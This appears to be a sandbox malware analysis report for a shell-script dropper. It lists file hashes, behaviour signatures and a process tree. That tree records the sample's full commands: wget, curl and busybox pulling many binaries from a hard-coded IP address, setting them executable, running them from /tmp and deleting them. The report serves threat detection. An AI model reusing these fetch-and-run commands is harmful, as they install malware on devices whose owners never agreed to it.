Analysis
-
max time kernel
102s -
max time network
131s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
-
Size
10KB
-
MD5
90e40b4503b0424a058f69437e1026ff
-
SHA1
035df066045d7bc2ab807fc923f25cf1a0f3e70e
-
SHA256
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474
-
SHA512
adfa914962ae7273bfd9238ce16c5b177765452a64ba873335cc42fdab6cf5cf072fb12803403aa10b44c957efbc5e2a76de724c912bde8c573afee70a1a1795
-
SSDEEP
192:8zddR70qV5mSi1dGxvSgM3omSi1de72gdR70qVa:8zddR70kHxvSgM3S72gdR70ka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 890 chmod 938 chmod 751 chmod 846 chmod 872 chmod 914 chmod 944 chmod 866 chmod 878 chmod 908 chmod 896 chmod 902 chmod 932 chmod 860 chmod 884 chmod 956 chmod 986 chmod 968 chmod 926 chmod 745 chmod 854 chmod 920 chmod 962 chmod 806 chmod 812 chmod 950 chmod 974 chmod 980 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH 746 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 752 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ 807 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd 813 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ 847 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p 855 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS 861 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj 867 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr 873 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ 879 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc 885 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 891 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 897 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo 903 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ 909 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc 915 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS 921 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj 927 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr 933 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 939 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 945 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo 951 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH 957 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 963 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ 969 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd 975 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ 981 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p 987 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj curl File opened for modification /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ curl File opened for modification /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 curl File opened for modification /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS curl File opened for modification /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd curl File opened for modification /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ curl File opened for modification /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ curl File opened for modification /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS curl File opened for modification /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 curl File opened for modification /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd curl File opened for modification /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p curl File opened for modification /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr curl File opened for modification /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ curl File opened for modification /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj curl File opened for modification /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo curl File opened for modification /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ curl File opened for modification /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc curl File opened for modification /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH curl File opened for modification /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p curl File opened for modification /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 curl File opened for modification /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc curl File opened for modification /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 curl File opened for modification /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr curl File opened for modification /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ curl File opened for modification /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH curl File opened for modification /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo curl File opened for modification /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 curl File opened for modification /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 curl
Processes
-
/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh1⤵PID:712
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:724
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:743
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:747
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:748
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:750
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:754
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:805
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:808
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:809
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:811
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:826
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:850
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:851
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:853
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:859
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:865
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:871
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:877
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:883
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:889
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:895
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:901
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:907
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:913
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:919
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:925
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:931
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:937
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:943
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:947
-
-
